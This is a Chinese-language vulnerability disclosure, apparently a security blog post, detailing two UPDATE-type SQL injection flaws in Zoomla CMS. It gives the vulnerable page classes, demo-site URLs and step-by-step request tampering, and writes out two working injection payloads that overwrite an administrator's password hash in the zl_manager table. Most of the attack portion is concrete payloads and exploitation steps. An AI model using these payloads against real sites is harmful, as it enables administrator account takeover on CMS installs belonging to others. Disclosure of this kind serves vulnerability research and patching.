逐浪CMS通用型SQL注(update型)两枚

某功能还是存在两个UPDATE型注入,咱们可以秒改管理员密码。当然了也可以insert管理员的,为了避免一些问题就不用insert来测试了

涉及的两个类:

public class MIS_Project_ProQuote : Page, IRequiresSessionState

public class MIS_Target_mailQuote : Page, IRequiresSessionState

注入点1:
代码如下

注册前台用户

访问:
http://demo.zoomla.cn/mis/target/proquote.aspx?types=7&id=1
点击引用按钮
改包
Proid输入随意的整数。

将id修改为注入的代码:

z1

1′;update zl_manager set adminpassword=’77963b7a931377ad4ab5ad6a9cd718aa’ where adminname=’test123′;–

此处注入和之前的不太一样。

实际上这里是hidden的参数有问题,但是由于hidden参数要二次从id赋值,所以只要改ID这个参数即可,直接改hidden是无效的。

查看测试管理员密码已经被修改:
z2
注入点2:

代码如下

前台注册用户。

http://demo.zoomla.cn/mis/target/mailquote.aspx?id=1;update zl_manager set adminpassword=’08f8e0260c64418510cefb2b06eee5cd’ where adminname=’test123′;–&types=8

访问上面的链接后,点击引用!!!!截断一下

然后改包,为下面的参数添加一个整型值:

z3
查看数据库,发现测试用的管理员密码已经被修改了
z4

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录